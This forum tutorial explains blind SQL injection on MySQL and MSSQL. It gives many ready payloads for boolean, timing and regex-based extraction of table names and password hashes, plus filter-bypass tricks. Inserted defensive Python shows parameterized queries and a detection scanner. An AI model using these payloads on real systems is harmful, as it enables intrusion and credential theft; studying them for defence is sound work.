
x32x01

ADMINISTRATOR
Why Blind SQL Injection?
Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

How can Blind SQL Injection be used?
There are several uses for Blind SQL Injection:
  • Testing for the vulnerability;
  • Finding a table name;
  • Exporting a value;
All of these techniques are based on a "guess attack", because the application only ever gives us two different outputs:

TRUE or FALSE. Let me explain better…

Testing vulnerability (MySQL – MSSQL):
Let’s start with an easy example. We have this type of URL:
Code:
example.com/news.php?id=2

It results in this type of query on the database:
Code:
SELECT * FROM news WHERE ID = 2

Now, we can try some SQL Injection techniques, for example the Blind SQL injection!
Code:
example.com/news.php?id=2 and 1=0

SQL query is now:
Code:
SELECT * FROM news WHERE ID = 2 and 1=0

In this case the query returns nothing (FALSE) because 1 is different from 0. Now the litmus test: force the AND to be TRUE and check whether the page comes back:
Code:
example.com/news.php?id=2 and 0=0

In this case 0 is equal to 0… Got it! We should now see the original news page. We now know that the page is vulnerable to Blind SQL Injection.
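As an added example (not from the original post), the `news.php?id=` handler written two ways in Python, against an in-memory SQLite table standing in for the MySQL `news` table: the concatenating version hands the attacker the TRUE/FALSE oracle described above, while the validating, parameterized version returns the same result for both probes. Table contents and function names are constructed for this illustration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the post's `news` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(1, "first post"), (2, "second post"), (3, "third post")],
    )
    return conn


def fetch_news_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """String concatenation: '2 and 1=0' becomes part of the SQL, exactly as in the post."""
    return conn.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()


def fetch_news_safe(conn: sqlite3.Connection, raw_id: str):
    """Validate the type first, then bind a parameter; the input is never parsed as SQL."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return []  # reject like an HTTP 400 would; no query is run at all
    return conn.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchall()


def oracle_leaks(fetch, conn: sqlite3.Connection) -> bool:
    """The post's litmus test: do 'and 1=0' and 'and 0=0' produce different pages?"""
    false_page = fetch(conn, "2 and 1=0")
    true_page = fetch(conn, "2 and 0=0")
    return false_page != true_page


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks an oracle:", oracle_leaks(fetch_news_vulnerable, db))
    print("parameterized query leaks an oracle:", oracle_leaks(fetch_news_safe, db))
```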

Time attack (MySQL)
When you can’t see any difference in the page at all, you must use a time attack. In this example we will try to obtain the password of the root user in MySQL (if you have root privileges on MySQL). The BENCHMARK function is used to keep the server busy for several seconds.

Syntax: BENCHMARK(count, expression). Wrapped in an IF statement, it lets you build a time attack in MySQL:
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = 'root';

And so on, until you see the BENCHMARK running (a delay of a few more seconds). Then proceed with the second character of the password…

Time attack (MSSQL)
In this example we will try to obtain a username from the sysusers table. A simple way to generate time delays is to take advantage of one of the biggest database problems, the one that made performance-tuning techniques necessary: heavy queries. All you need to generate a time delay is a table with some rows and a query that forces the engine to work, in other words a query that ignores everything the performance best practices recommend. (This technique was devised by Chema Alonso, Microsoft Security MVP.)
Code:
example.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2,
sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7,
sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

Positive result. The condition is true, and the response has a delay of 14 seconds. We now know that the ASCII value of the first letter of the first username in the sysusers table is lower than 300.
Code:
example.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2,
sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7,
sysusers AS sys8)>1 and 0>(select top 1 ascii(substring(name,1,1)) from sysusers)

Negative result. One-second response delay. We now know that the ASCII value of the first letter of the first username in the sysusers table is higher than 0.

And so on for all the possibilities, narrowing the range at each step:
Code:
[...] >1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
[...] >1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
[...] >1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
[...] >1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE
[...] >1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

Then the result is ASCII(119) = 'w'.

Start with the second letter… and so on!

Regexp attack methodology
This is our own creation and it is the fastest way to extract information from a database. With it you can save a lot of time and bandwidth! The methodology is pretty simple: we define a range of numbers/chars/special chars that is matched with the REGEXP (MySQL) or LIKE (MSSQL) operator.

Let’s start with an example, because it is simpler to understand that way.

Finding table name with Regexp attack (MySQL)
In this example we will extract the first matching record of information_schema.tables; you must know the database name!
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)

This is the same blind SQL injection test as before: if we see the correct page, everything is OK.
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)

In this case we know that the first matching record starts with a character in the range [a-z]. The following sequence shows how to extract the complete name of the record:
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-g]' LIMIT 0,1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-n]' LIMIT 0,1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-l]' LIMIT 0,1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)
True

The first letter of the table is ‘n’. But are there other tables that start with ‘n’?
Let’s change the limit to 1,1:
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 1,1)
False

No, there are no more tables that start with ‘n’. From now on we extend the regular expression one character at a time:
Code:
'^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE

To verify that we have found the complete table name, we test an anchored expression such as:
Code:
'^news$'

Finding table name with Regexp attack (MSSQL)
For MSSQL, the syntax is a little more complicated. There are two limitations: LIMIT and REGEXP do not exist.

To work around them, we use TOP and LIKE. See this example:
Code:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE
TABLE_SCHEMA='blind_sqli' and table_name LIKE '[a-z]%' )
True

SELECT TOP is used to extract the first x records from the information_schema table. In MSSQL, the LIKE operator plays the role of MySQL's REGEXP, but the syntax is not the same.

To learn more about LIKE, consult http://msdn.microsoft.com/en-us/library/ms179859.aspx

When you need to grab the second table_name, you must add “table_name NOT IN (SELECT TOP x table_name FROM information_schema.tables)”, as in the example below:

Code:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE
TABLE_SCHEMA='blind_sqli' and table_name NOT IN ( SELECT TOP 1 table_name
FROM information_schema.tables) and table_name LIKE '[a-z]%' )

The second SELECT TOP excludes the first X rows so that row X+1 is extracted.
As in the MySQL example, we extend the LIKE expression to extract the first row: 'n[a-z]%' -> 'ne[a-z]%' -> 'new[a-z]%' -> 'news[a-z]%' -> TRUE. Unlike the MySQL ending, we get TRUE here because '%' matches any string of zero or more characters.

To check for the end of the name, we append “_” and verify whether another character exists: 'news%' TRUE -> 'news_' FALSE.

Exporting a value with Regexp attack (MySQL)
In this example we will extract an MD5 hash from a known table name (in this case ‘users’).

Remember: an MD5 hex digest can ONLY contain [a-f0-9] characters.

We will use the same methodology described in “Finding table name”.

Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[a-f]' AND
ID=1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[0-9]' AND
ID=1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[0-4]' AND
ID=1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[5-9]' AND
ID=1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[5-7]' AND
ID=1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^5' AND
ID=1)
True

Our hash starts with ‘5’, found in just 6 tries!

Exporting a value with Regexp attack (MSSQL)
Same approach as for MySQL and “Finding table name”. Here we continue with the search for the second char. An example below:
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[a-f]%' AND
ID=1)
True
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[a-c]%' AND
ID=1)
False
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[d-f]%' AND
ID=1)
True
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[d-e]%' AND
ID=1)
False
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5f%' AND
ID=1)
True

We have found that our second char is ‘f’ in just 5 tries! (This is also the worst case for brute-force.)

Time considerations
Take for example the MD5 case. We must export a hash of 32 chars using Blind SQL Injection.

You know that there are only 16 chars to be tested (1234567890abcdef);
In the optimistic case, both the regexp and the normal blind method need 32 queries;
In the worst case, regexp needs 128 queries and normal blind needs 512 queries;

Let’s now take a password case. We must export a 15-char password from the mixalpha-numericspecial14 charset.

You know that there are 76 chars to be tested (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=);

In the optimistic case, both regexp and normal blind need 15 queries;
In the worst case, regexp needs approx. 94 queries and normal blind needs 1140 queries;

Bypassing filters
Below are examples of how common filters are bypassed.

TRIM (NO SPACES ALLOWED):
Code:
SELECT/*not important*/1/*really...*/FROM/*im serious*/users → (open and close a comment in place of each space)
Code:
SELECT(1)FROM(information_schema.tables) → (parentheses instead of spaces)

Special chars like:
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line

Example:
Code:
SELECT%09TABLE_NAME%09FROM%0dinformation_schema.tables

SPECIAL CHARS (NO ‘ OR “ ALLOWED):
Usually ‘ and “ are used to input some kind of string, so instead you can input the HEX
value:
Code:
SELECT passwd FROM users WHERE username=0x61646d696e

where 0x61646d696e is the hex value of ‘admin’, or use the CHAR function:
Code:
SELECT passwd FROM users WHERE
username=CONCAT(CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110))
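To show the defender's side of the “Bypassing filters” section (and of the REGEXP, BENCHMARK and sysusers probes above), here is an added example that is not part of the original post: a small access-log scanner that undoes the evasions (URL encoding, inline comments, %09/%0a/%0c/%0d whitespace) before matching, run over constructed log lines. The log lines, indicator names and patterns are my own assumptions, not anyone's production ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the post); the query strings mirror the
# payload shapes the post walks through, plus one benign request for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=2 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=2%20and%201%3D0 HTTP/1.1" 200 312
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20and%201%3D(SELECT%201%20FROM%20information_schema.tables%20WHERE%20table_name%20REGEXP%20'%5E%5Ba-n%5D'%20LIMIT%200,1) HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /news.aspx?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20AS%20sys2)%3E1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=2/**/and/**/1=(SELECT(1)FROM(users)WHERE(username=0x61646d696e)) HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=2%09and%09IF(1=1,BENCHMARK(100000,SHA1(1)),0) HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=regexp+tutorial HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/')

# Each indicator is matched against the *normalized* request target.
INDICATORS = [
    ("boolean_tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b")),
    ("regexp_like_probe", re.compile(r"\b(regexp|like)\s+'[\^\[]")),
    ("time_benchmark",    re.compile(r"\bbenchmark\s*\(")),
    ("mssql_heavy_join",  re.compile(r"(sysusers\s+as\s+\w+\s*,\s*)+sysusers")),
    ("schema_enum",       re.compile(r"information_schema\.tables")),
    ("hex_string",        re.compile(r"\b0x[0-9a-f]{2,}\b")),
    ("char_concat",       re.compile(r"\bchar\s*\(\s*\d+\s*\)")),
]
BYPASS_RE = re.compile(r"/\*.*?\*/|[\t\n\r\f\v]", re.S)  # comments or %09/%0a/%0c/%0d


def normalize(target: str) -> str:
    """Undo the tricks from the 'Bypassing filters' section before matching."""
    decoded = unquote_plus(unquote_plus(target))  # second pass catches %2520-style double encoding
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", no_comments).lower()  # tabs, newlines, form feeds -> one space


def classify(line: str):
    """Return (ip, path, [indicator names]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    norm = normalize(target)
    hits = [name for name, rx in INDICATORS if rx.search(norm)]
    if BYPASS_RE.search(unquote_plus(target)):  # evasion itself is worth flagging
        hits.append("whitespace_bypass")
    return m.group("ip"), target.split("?", 1)[0], hits


def scan(log_text: str):
    """Only requests that tripped at least one indicator are returned."""
    results = (classify(line) for line in log_text.splitlines())
    return [r for r in results if r and r[2]]


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits)}")
```

Normalizing before matching is the point: the comment, tab and hex variants in the section above all collapse to the same shape the plain pattern already catches.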

Conclusions
To conclude our paper, we must point out that:
1. It is possible to make a “combo” attack, combining this with the “Time Attack” or other techniques;
2. The regexp you use could also be an explicit list of chars like “[abcdef0123456789]”;
3. Our English is fu**ing bad! 🙂
 